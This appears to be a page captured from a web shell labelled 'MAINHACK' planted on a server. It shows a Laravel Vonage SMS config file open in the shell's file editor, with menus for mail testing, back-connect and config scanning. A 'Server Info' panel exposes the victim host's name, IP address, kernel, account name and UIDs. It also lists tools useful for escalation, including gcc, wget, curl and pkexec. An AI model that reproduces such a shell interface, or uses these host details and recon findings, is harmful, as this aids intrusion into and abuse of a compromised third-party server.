[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: vonage.php
<?php return [ /* |-------------------------------------------------------------------------- | SMS "From" Number |-------------------------------------------------------------------------- | | This configuration option defines the phone number that will be used as | the "from" number for all outgoing text messages. You should provide | the number you have already reserved within your Vonage dashboard. | */ 'sms_from' => env('VONAGE_SMS_FROM'), /* |-------------------------------------------------------------------------- | API Credentials |-------------------------------------------------------------------------- | | The following configuration options contain your API credentials, which | may be accessed from your Vonage dashboard. These credentials may be | used to authenticate with the Vonage API so you may send messages. | */ 'api_key' => env('VONAGE_KEY'), 'api_secret' => env('VONAGE_SECRET'), 'application_id' => env('VONAGE_APPLICATION_ID'), /* |-------------------------------------------------------------------------- | Signature Secret |-------------------------------------------------------------------------- | | If your application is receiving webhooks from Vonage, you may wish to | configure a message signature secret so that you can ensure each of | the inbound webhook calls are actually originating within Vonage. | */ 'signature_secret' => env('VONAGE_SIGNATURE_SECRET'), /* |-------------------------------------------------------------------------- | Private Key |-------------------------------------------------------------------------- | | Some of Vonage's recent APIs utilize JWTs for authentication, which also | require a private key so that they may be signed. You may define your | application's private key string below via the configuration value. | */ 'private_key' => env('VONAGE_PRIVATE_KEY'), /* |-------------------------------------------------------------------------- | Application Identifiers |-------------------------------------------------------------------------- | | Adding an application name and version may assist you in identifying | problems with your application or when viewing analytics for your | application's API usage within the dedicated Vonage dashboards. | */ 'app' => [ 'name' => env('VONAGE_APP_NAME', 'Laravel'), 'version' => env('VONAGE_APP_VERSION', '1.1.2'), ], ];
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.68 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002